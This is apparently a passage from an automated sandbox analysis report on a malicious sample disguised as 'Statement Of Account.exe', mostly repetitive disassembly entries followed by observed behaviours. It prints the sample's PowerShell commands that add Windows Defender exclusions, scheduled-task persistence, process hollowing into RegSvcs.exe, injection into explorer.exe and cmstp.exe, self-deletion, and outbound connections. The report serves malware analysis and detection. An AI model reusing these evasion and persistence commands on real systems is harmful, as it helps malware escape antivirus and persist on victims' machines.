Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAC8F9 mov eax, dword ptr fs:[00000030h] 8_2_00FAC8F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0100892B mov eax, dword ptr fs:[00000030h] 8_2_0100892B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9E8C0 mov eax, dword ptr fs:[00000030h] 8_2_00F9E8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01044940 mov eax, dword ptr fs:[00000030h] 8_2_01044940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FFC89D mov eax, dword ptr fs:[00000030h] 8_2_00FFC89D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F70887 mov eax, dword ptr fs:[00000030h] 8_2_00F70887
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01014978 mov eax, dword ptr fs:[00000030h] 8_2_01014978
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FFE872 mov eax, dword ptr fs:[00000030h] 8_2_00FFE872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F74859 mov eax, dword ptr fs:[00000030h] 8_2_00F74859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA0854 mov eax, dword ptr fs:[00000030h] 8_2_00FA0854
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F82840 mov ecx, dword ptr fs:[00000030h] 8_2_00F82840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010069C0 mov eax, dword ptr fs:[00000030h] 8_2_010069C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAA830 mov eax, dword ptr fs:[00000030h] 8_2_00FAA830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F92835 mov eax, dword ptr fs:[00000030h] 8_2_00F92835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F92835 mov ecx, dword ptr fs:[00000030h] 8_2_00F92835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0103A9D3 mov eax, dword ptr fs:[00000030h] 8_2_0103A9D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FFC810 mov eax, dword ptr fs:[00000030h] 8_2_00FFC810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA29F9 mov eax, dword ptr fs:[00000030h] 8_2_00FA29F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FFE9E0 mov eax, dword ptr fs:[00000030h] 8_2_00FFE9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7A9D0 mov eax, dword ptr fs:[00000030h] 8_2_00F7A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA49D0 mov eax, dword ptr fs:[00000030h] 8_2_00FA49D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101483A mov eax, dword ptr fs:[00000030h] 8_2_0101483A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101483A mov eax, dword ptr fs:[00000030h] 8_2_0101483A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF89B3 mov esi, dword ptr fs:[00000030h] 8_2_00FF89B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF89B3 mov eax, dword ptr fs:[00000030h] 8_2_00FF89B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF89B3 mov eax, dword ptr fs:[00000030h] 8_2_00FF89B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h] 8_2_00F829A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h] 8_2_00F829A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h] 8_2_00F829A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h] 8_2_00F829A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h] 8_2_00F829A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h] 8_2_00F829A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h] 8_2_00F829A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h] 8_2_00F829A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h] 8_2_00F829A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h] 8_2_00F829A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h] 8_2_00F829A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h] 8_2_00F829A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F829A0 mov eax, dword ptr fs:[00000030h] 8_2_00F829A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F709AD mov eax, dword ptr fs:[00000030h] 8_2_00F709AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F709AD mov eax, dword ptr fs:[00000030h] 8_2_00F709AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01006870 mov eax, dword ptr fs:[00000030h] 8_2_01006870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01006870 mov eax, dword ptr fs:[00000030h] 8_2_01006870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FFC97C mov eax, dword ptr fs:[00000030h] 8_2_00FFC97C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB096E mov eax, dword ptr fs:[00000030h] 8_2_00FB096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB096E mov edx, dword ptr fs:[00000030h] 8_2_00FB096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB096E mov eax, dword ptr fs:[00000030h] 8_2_00FB096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F96962 mov eax, dword ptr fs:[00000030h] 8_2_00F96962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F96962 mov eax, dword ptr fs:[00000030h] 8_2_00F96962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F96962 mov eax, dword ptr fs:[00000030h] 8_2_00F96962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF0946 mov eax, dword ptr fs:[00000030h] 8_2_00FF0946
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010408C0 mov eax, dword ptr fs:[00000030h] 8_2_010408C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF892A mov eax, dword ptr fs:[00000030h] 8_2_00FF892A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0103A8E4 mov eax, dword ptr fs:[00000030h] 8_2_0103A8E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FFC912 mov eax, dword ptr fs:[00000030h] 8_2_00FFC912
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F68918 mov eax, dword ptr fs:[00000030h] 8_2_00F68918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F68918 mov eax, dword ptr fs:[00000030h] 8_2_00F68918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FEE908 mov eax, dword ptr fs:[00000030h] 8_2_00FEE908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FEE908 mov eax, dword ptr fs:[00000030h] 8_2_00FEE908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01044B00 mov eax, dword ptr fs:[00000030h] 8_2_01044B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAAAEE mov eax, dword ptr fs:[00000030h] 8_2_00FAAAEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAAAEE mov eax, dword ptr fs:[00000030h] 8_2_00FAAAEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F70AD0 mov eax, dword ptr fs:[00000030h] 8_2_00F70AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA4AD0 mov eax, dword ptr fs:[00000030h] 8_2_00FA4AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA4AD0 mov eax, dword ptr fs:[00000030h] 8_2_00FA4AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01038B28 mov eax, dword ptr fs:[00000030h] 8_2_01038B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01038B28 mov eax, dword ptr fs:[00000030h] 8_2_01038B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FC6ACC mov eax, dword ptr fs:[00000030h] 8_2_00FC6ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FC6ACC mov eax, dword ptr fs:[00000030h] 8_2_00FC6ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FC6ACC mov eax, dword ptr fs:[00000030h] 8_2_00FC6ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01006B40 mov eax, dword ptr fs:[00000030h] 8_2_01006B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01006B40 mov eax, dword ptr fs:[00000030h] 8_2_01006B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0103AB40 mov eax, dword ptr fs:[00000030h] 8_2_0103AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01018B42 mov eax, dword ptr fs:[00000030h] 8_2_01018B42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01024B4B mov eax, dword ptr fs:[00000030h] 8_2_01024B4B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01024B4B mov eax, dword ptr fs:[00000030h] 8_2_01024B4B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101EB50 mov eax, dword ptr fs:[00000030h] 8_2_0101EB50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01042B57 mov eax, dword ptr fs:[00000030h] 8_2_01042B57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01042B57 mov eax, dword ptr fs:[00000030h] 8_2_01042B57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01042B57 mov eax, dword ptr fs:[00000030h] 8_2_01042B57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01042B57 mov eax, dword ptr fs:[00000030h] 8_2_01042B57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F78AA0 mov eax, dword ptr fs:[00000030h] 8_2_00F78AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F78AA0 mov eax, dword ptr fs:[00000030h] 8_2_00F78AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FC6AA4 mov eax, dword ptr fs:[00000030h] 8_2_00FC6AA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA8A90 mov edx, dword ptr fs:[00000030h] 8_2_00FA8A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6EA80 mov eax, dword ptr fs:[00000030h] 8_2_00F6EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6EA80 mov eax, dword ptr fs:[00000030h] 8_2_00F6EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7EA80 mov eax, dword ptr fs:[00000030h] 8_2_00F7EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7EA80 mov eax, dword ptr fs:[00000030h] 8_2_00F7EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7EA80 mov eax, dword ptr fs:[00000030h] 8_2_00F7EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7EA80 mov eax, dword ptr fs:[00000030h] 8_2_00F7EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7EA80 mov eax, dword ptr fs:[00000030h] 8_2_00F7EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7EA80 mov eax, dword ptr fs:[00000030h] 8_2_00F7EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7EA80 mov eax, dword ptr fs:[00000030h] 8_2_00F7EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7EA80 mov eax, dword ptr fs:[00000030h] 8_2_00F7EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7EA80 mov eax, dword ptr fs:[00000030h] 8_2_00F7EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FECA72 mov eax, dword ptr fs:[00000030h] 8_2_00FECA72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FECA72 mov eax, dword ptr fs:[00000030h] 8_2_00FECA72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FACA6F mov eax, dword ptr fs:[00000030h] 8_2_00FACA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FACA6F mov eax, dword ptr fs:[00000030h] 8_2_00FACA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FACA6F mov eax, dword ptr fs:[00000030h] 8_2_00FACA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80A5B mov eax, dword ptr fs:[00000030h] 8_2_00F80A5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80A5B mov eax, dword ptr fs:[00000030h] 8_2_00F80A5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F76A50 mov eax, dword ptr fs:[00000030h] 8_2_00F76A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F76A50 mov eax, dword ptr fs:[00000030h] 8_2_00F76A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F76A50 mov eax, dword ptr fs:[00000030h] 8_2_00F76A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F76A50 mov eax, dword ptr fs:[00000030h] 8_2_00F76A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F76A50 mov eax, dword ptr fs:[00000030h] 8_2_00F76A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F76A50 mov eax, dword ptr fs:[00000030h] 8_2_00F76A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F76A50 mov eax, dword ptr fs:[00000030h] 8_2_00F76A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01024BB0 mov eax, dword ptr fs:[00000030h] 8_2_01024BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01024BB0 mov eax, dword ptr fs:[00000030h] 8_2_01024BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F94A35 mov eax, dword ptr fs:[00000030h] 8_2_00F94A35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F94A35 mov eax, dword ptr fs:[00000030h] 8_2_00F94A35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101EBD0 mov eax, dword ptr fs:[00000030h] 8_2_0101EBD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9EA2E mov eax, dword ptr fs:[00000030h] 8_2_00F9EA2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FACA24 mov eax, dword ptr fs:[00000030h] 8_2_00FACA24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FFCA11 mov eax, dword ptr fs:[00000030h] 8_2_00FFCA11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F68A00 mov eax, dword ptr fs:[00000030h] 8_2_00F68A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F68A00 mov eax, dword ptr fs:[00000030h] 8_2_00F68A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9EBFC mov eax, dword ptr fs:[00000030h] 8_2_00F9EBFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F78BF0 mov eax, dword ptr fs:[00000030h] 8_2_00F78BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F78BF0 mov eax, dword ptr fs:[00000030h] 8_2_00F78BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F78BF0 mov eax, dword ptr fs:[00000030h] 8_2_00F78BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FFCBF0 mov eax, dword ptr fs:[00000030h] 8_2_00FFCBF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\Statement Of Account.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe Network Connect: 91.195.240.94 80
Source: C:\Windows\explorer.exe Network Connect: 154.12.38.29 80
Source: C:\Windows\explorer.exe Network Connect: 34.149.87.45 80
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement Of Account.exe"
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SdYCcXyq.exe"
Source: C:\Users\user\Desktop\Statement Of Account.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Statement Of Account.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: NULL target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: NULL target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmstp.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\cmstp.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread register set: target process: 2580
Source: C:\Windows\SysWOW64\cmstp.exe Thread register set: target process: 2580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: 860000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section unmapped: C:\Windows\SysWOW64\cmstp.exe base address: D0000
Source: C:\Users\user\Desktop\Statement Of Account.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
Source: C:\Users\user\Desktop\Statement Of Account.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
Source: C:\Users\user\Desktop\Statement Of Account.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 6A4008
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: CE9008
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmp9A8F.tmp"
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmpAA00.tmp"
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\SysWOW64\cmstp.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: explorer.exe, 00000009.00000000.1714538739.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1721919184.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000009.00000000.1707519329.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.2938732437.00000000018A1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000009.00000000.1704959989.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2937710239.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1Progman$
Source: explorer.exe, 00000009.00000000.1707519329.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.2938732437.00000000018A1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000009.00000000.1707519329.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.2938732437.00000000018A1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Users\user\Desktop\Statement Of Account.exe VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
